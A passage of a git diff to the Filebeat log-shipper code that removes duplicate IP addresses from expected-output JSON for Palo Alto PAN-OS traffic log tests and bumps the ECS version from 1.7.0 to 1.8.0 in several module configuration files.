"192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4836,8 +4791,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4944,8 +4898,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -5052,8 +5005,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -5160,8 +5112,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -5268,8 +5219,7 @@ "related.ip": [ "192.168.15.224", "216.58.194.98", - "192.168.1.63", - "216.58.194.98" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "216.58.194.98", @@ -5373,8 +5323,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5478,8 +5427,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5583,8 +5531,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5688,8 +5635,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5793,8 +5739,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5898,8 +5843,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6003,8 +5947,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6108,8 +6051,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6213,8 +6155,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6318,8 +6259,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6426,8 +6366,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6534,8 +6473,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6642,8 +6580,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6750,8 +6687,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6858,8 +6794,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6966,8 +6901,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7074,8 +7008,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7182,8 +7115,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7290,8 +7222,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7398,8 +7329,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7506,8 +7436,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7614,8 +7543,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7722,8 +7650,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7830,8 +7757,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7938,8 +7864,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -8046,8 +7971,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json index 200e02370d3d..a6877841bd39 100644 --- a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json @@ -86,8 +86,7 @@ "related.ip": [ "192.168.15.207", "184.51.253.152", - "192.168.1.63", - "184.51.253.152" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 5976, @@ -196,8 +195,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -309,8 +307,7 @@ "related.ip": [ "192.168.15.207", "17.253.3.202", - "192.168.1.63", - "17.253.3.202" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1035, @@ -419,8 +416,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -532,8 +528,7 @@ "related.ip": [ "192.168.15.196", "216.58.194.99", - "192.168.1.63", - "216.58.194.99" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1613, @@ -642,8 +637,7 @@ "related.ip": [ "192.168.15.224", "209.234.224.22", - "192.168.1.63", - "209.234.224.22" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 21111, @@ -752,8 +746,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -862,8 +855,7 @@ "related.ip": [ "192.168.15.224", "172.217.2.238", - "192.168.1.63", - "172.217.2.238" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 3732, @@ -972,8 +964,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 221, @@ -1082,8 +1073,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 221, @@ -1192,8 +1182,7 @@ "related.ip": [ "192.168.15.207", "17.249.60.78", - "192.168.1.63", - "17.249.60.78" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 5469, @@ -1302,8 +1291,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 224, @@ -1412,8 +1400,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 117, @@ -1522,8 +1509,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 307, @@ -1632,8 +1618,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 365, @@ -1742,8 +1727,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -1852,8 +1836,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 161, @@ -1962,8 +1945,7 @@ "related.ip": [ "192.168.15.224", "98.138.49.44", - "192.168.1.63", - "98.138.49.44" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 7805, @@ -2072,8 +2054,7 @@ "related.ip": [ "192.168.15.224", "72.30.3.43", - "192.168.1.63", - "72.30.3.43" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 6106, @@ -2182,8 +2163,7 @@ "related.ip": [ "192.168.15.196", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 196, @@ -2292,8 +2272,7 @@ "related.ip": [ "192.168.15.224", "172.217.9.142", - "192.168.1.63", - "172.217.9.142" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 3245, @@ -2402,8 +2381,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 179, @@ -2515,8 +2493,7 @@ "related.ip": [ "192.168.15.224", "54.84.80.198", - "192.168.1.63", - "54.84.80.198" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 4537, @@ -2626,8 +2603,7 @@ "related.ip": [ "192.168.15.224", "199.167.55.52", - "192.168.1.63", - "199.167.55.52" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 0, @@ -2736,8 +2712,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -2842,8 +2817,7 @@ "related.ip": [ "192.168.15.210", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 130, @@ -2949,8 +2923,7 @@ "related.ip": [ "192.168.15.224", "172.217.9.142", - "192.168.1.63", - "172.217.9.142" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1991, @@ -3059,8 +3032,7 @@ "related.ip": [ "192.168.15.224", "151.101.2.2", - "192.168.1.63", - "151.101.2.2" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 523, @@ -3172,8 +3144,7 @@ "related.ip": [ "192.168.15.224", "216.58.194.66", - "192.168.1.63", - "216.58.194.66" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 2428, @@ -3282,8 +3253,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -3392,8 +3362,7 @@ "related.ip": [ "192.168.15.210", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 196, @@ -3502,8 +3471,7 @@ "related.ip": [ "192.168.15.224", "184.51.253.193", - "192.168.1.63", - "184.51.253.193" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 5003, @@ -3612,8 +3580,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 171, @@ -3723,8 +3690,7 @@ "related.ip": [ "192.168.15.224", "199.167.55.52", - "192.168.1.63", - "199.167.55.52" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 0, @@ -3836,8 +3802,7 @@ "related.ip": [ "192.168.15.224", "199.167.52.219", - "192.168.1.63", - "199.167.52.219" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 2316, @@ -3949,8 +3914,7 @@ "related.ip": [ "192.168.15.224", "52.71.117.196", - "192.168.1.63", - "52.71.117.196" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 13966, @@ -4059,8 +4023,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 244, @@ -4169,8 +4132,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 205, @@ -4282,8 +4244,7 @@ "related.ip": [ "192.168.15.224", "35.186.194.41", - "192.168.1.63", - "35.186.194.41" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 2302, @@ -4390,8 +4351,7 @@ "related.ip": [ "192.168.15.224", "35.201.124.9", - "192.168.1.63", - "35.201.124.9" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 6757, @@ -4503,8 +4463,7 @@ "related.ip": [ "192.168.15.224", "100.24.131.237", - "192.168.1.63", - "100.24.131.237" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 9007, @@ -4613,8 +4572,7 @@ "related.ip": [ "192.168.15.224", "184.51.252.247", - "192.168.1.63", - "184.51.252.247" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 661, @@ -4726,8 +4684,7 @@ "related.ip": [ "192.168.15.224", "35.190.88.148", - "192.168.1.63", - "35.190.88.148" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 11136, @@ -4839,8 +4796,7 @@ "related.ip": [ "192.168.15.224", "35.186.243.83", - "192.168.1.63", - "35.186.243.83" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 11136, @@ -4949,8 +4905,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 182, @@ -5059,8 +5014,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 90, @@ -5172,8 +5126,7 @@ "related.ip": [ "192.168.15.224", "100.24.165.74", - "192.168.1.63", - "100.24.165.74" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 6669, @@ -5282,8 +5235,7 @@ "related.ip": [ "192.168.15.224", "184.51.252.247", - "192.168.1.63", - "184.51.252.247" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 661, @@ -5390,8 +5342,7 @@ "related.ip": [ "192.168.15.224", "35.201.94.140", - "192.168.1.63", - "35.201.94.140" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 11136, @@ -5496,8 +5447,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -5606,8 +5556,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 144, @@ -5716,8 +5665,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 206, @@ -5826,8 +5774,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 206, @@ -5936,8 +5883,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 169, @@ -6046,8 +5992,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 132, @@ -6156,8 +6101,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 127, @@ -6266,8 +6210,7 @@ "related.ip": [ "192.168.15.196", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 105, @@ -6376,8 +6319,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, @@ -6486,8 +6428,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 134, @@ -6596,8 +6537,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 179, @@ -6706,8 +6646,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 218, @@ -6816,8 +6755,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, @@ -6926,8 +6864,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 305, @@ -7039,8 +6976,7 @@ "related.ip": [ "192.168.15.224", "66.28.0.45", - "192.168.1.63", - "66.28.0.45" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 527, @@ -7149,8 +7085,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 153, @@ -7259,8 +7194,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 169, @@ -7369,8 +7303,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 128, @@ -7479,8 +7412,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 181, @@ -7589,8 +7521,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 121, @@ -7702,8 +7633,7 @@ "related.ip": [ "192.168.15.224", "23.52.174.25", - "192.168.1.63", - "23.52.174.25" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1246, @@ -7812,8 +7742,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 315, @@ -7922,8 +7851,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 130, @@ -8035,8 +7963,7 @@ "related.ip": [ "192.168.15.224", "54.230.5.228", - "192.168.1.63", - "54.230.5.228" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 288, @@ -8145,8 +8072,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 149, @@ -8255,8 +8181,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 202, @@ -8365,8 +8290,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 195, @@ -8475,8 +8399,7 @@ "related.ip": [ "192.168.15.195", "208.83.246.20", - "192.168.1.63", - "208.83.246.20" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 90, @@ -8584,8 +8507,7 @@ "related.ip": [ "192.168.15.196", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 192, @@ -8693,8 +8615,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 208, @@ -8802,8 +8723,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 100, @@ -8913,8 +8833,7 @@ "related.ip": [ "192.168.15.224", "35.185.88.112", - "192.168.1.63", - "35.185.88.112" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 7237, @@ -9023,8 +8942,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 109, @@ -9133,8 +9051,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 116, @@ -9243,8 +9160,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 96, @@ -9356,8 +9272,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9469,8 +9384,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9582,8 +9496,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9692,8 +9605,7 @@ "related.ip": [ "192.168.15.224", "104.254.150.9", - "192.168.1.63", - "104.254.150.9" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 7820, @@ -9805,8 +9717,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9918,8 +9829,7 @@ "related.ip": [ "192.168.15.224", "52.0.218.108", - "192.168.1.63", - "52.0.218.108" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 214, @@ -10031,8 +9941,7 @@ "related.ip": [ "192.168.15.224", "52.6.117.19", - "192.168.1.63", - "52.6.117.19" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 214, @@ -10144,8 +10053,7 @@ "related.ip": [ "192.168.15.224", "34.238.96.22", - "192.168.1.63", - "34.238.96.22" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 214, @@ -10257,8 +10165,7 @@ "related.ip": [ "192.168.15.224", "130.211.47.17", - "192.168.1.63", - "130.211.47.17" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 280, @@ -10367,8 +10274,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, @@ -10477,8 +10383,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -10587,8 +10492,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, @@ -10697,8 +10601,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 170, @@ -10807,8 +10710,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, @@ -10917,8 +10819,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, @@ -11027,8 +10928,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 166, diff --git a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml index 0b23c8ce377b..33545d1ac548 100644 --- a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml +++ b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/rabbitmq/log/config/log.yml b/x-pack/filebeat/module/rabbitmq/log/config/log.yml index 8c1ba12a8264..730ea5c04f37 100644 --- a/x-pack/filebeat/module/rabbitmq/log/config/log.yml +++ b/x-pack/filebeat/module/rabbitmq/log/config/log.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/radware/defensepro/config/input.yml b/x-pack/filebeat/module/radware/defensepro/config/input.yml index 76a4ff731651..a2b133a9dc45 100644 --- a/x-pack/filebeat/module/radware/defensepro/config/input.yml +++ b/x-pack/filebeat/module/radware/defensepro/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/snort/log/config/input.yml b/x-pack/filebeat/module/snort/log/config/input.yml index b7fe0e504afa..17aab4adc03f 100644 --- a/x-pack/filebeat/module/snort/log/config/input.yml +++ b/x-pack/filebeat/module/snort/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/snyk/audit/config/config.yml b/x-pack/filebeat/module/snyk/audit/config/config.yml index 3a41b5086903..73cd5423a028 100644 --- a/x-pack/filebeat/module/snyk/audit/config/config.yml +++ b/x-pack/filebeat/module/snyk/audit/config/config.yml @@ -73,4 +73,4 @@ processors: - 